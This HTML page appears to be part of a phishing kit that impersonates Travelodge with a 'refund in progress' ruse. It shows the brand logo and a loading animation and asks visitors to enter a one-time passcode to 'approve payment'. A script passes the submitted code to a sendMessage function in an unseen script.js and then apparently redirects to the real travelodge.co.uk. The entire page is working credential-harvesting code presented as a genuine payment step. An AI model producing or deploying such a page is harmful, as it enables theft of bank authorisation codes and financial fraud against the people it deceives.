<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <title>Loading</title>
    <style>
      body {
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
        height: 95vh;
        width: 95vw;
        margin: 0;
        background-color: #004282;
      }

      .logo {
        width: 200px;
        height: 200px;
        position: relative;
        transform: translateX(40px) translateY(50px);
      }

      .loader {
        width: 200px;
        height: 200px;
        position: relative;
        transform: translateX(140px) translateY(80px);
      }

      .text {
        position: relative;
        transform: translateX(40px) translateY(50px);
        color: aliceblue;
      }

      .otpform {
        position: relative;
        transform: translateX(80px) translateY(100px);
        color: aliceblue;
      }

      .text2 {
        display: none;
        position: relative;
        transform: translateX(40px) translateY(170px);
        color: aliceblue;
      }

      .dot {
        position: absolute;
        width: 20px;
        height: 20px;
        border-radius: 50%;
        background-color: aqua;
        animation: rotate 2s linear infinite;
      }

      @keyframes rotate {
        0% {
          transform: translate(-50%, -50%) rotate(0deg) translateX(100px)
            rotate(0deg);
        }
        100% {
          transform: translate(-50%, -50%) rotate(360deg) translateX(100px)
            rotate(-360deg);
        }
      }
      .dot:nth-child(1) {
        animation-delay: -2s;
      }
      .dot:nth-child(2) {
        animation-delay: -1.8s;
      }
      .dot:nth-child(3) {
        animation-delay: -1.6s;
      }
      .dot:nth-child(4) {
        animation-delay: -1.4s;
      }
      .dot:nth-child(5) {
        animation-delay: -1.2s;
      }
      .dot:nth-child(6) {
        animation-delay: -1s;
      }
      .dot:nth-child(7) {
        animation-delay: -0.8s;
      }
      .dot:nth-child(8) {
        animation-delay: -0.6s;
      }
      .dot:nth-child(9) {
        animation-delay: -0.4s;
      }
      .dot:nth-child(10) {
        animation-delay: -0.2s;
      }
    </style>

    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN"
      crossorigin="anonymous"
    />
    <script src="script.js"></script>
    <script>
      window.onload = () => {
        const form = document.querySelector(".otpform");
        const text = document.querySelector(".text2");
        form.addEventListener("submit", (e) => {
          e.preventDefault();
          const formData = new FormData(e.target);
          text.style.display = "block";
          sendMessage(formData, "https://travelodge.co.uk", 10000);
        });
      };
    </script>
  </head>
  <body style="background-color: #004282">
    <div class="logo">
      <img src="pp/images/travelodge_logo.png" alt="logo" />
    </div>
    <div class="loader">
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
      <div class="dot"></div>
    </div>
    <div class="text">
      <h4>Please approve payment via app or one-time passcode</h4>
    </div>
    <form class="otpform">
      <div class="row g-3">
        <div class="col">
          <input class="form-control" type="number" name="OTP Code" placeholder="OTP Code" minlength="6" required />
        </div>
        <div class="col">
          <button class="btn btn-primary" type="submit">Continue</button>
        </div>
      </div>
    </form>
    <div class="text2">
      <h4>Refund in progress....</h4>
    </div>
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
      crossorigin="anonymous"
    ></script>
  </body>
</html>
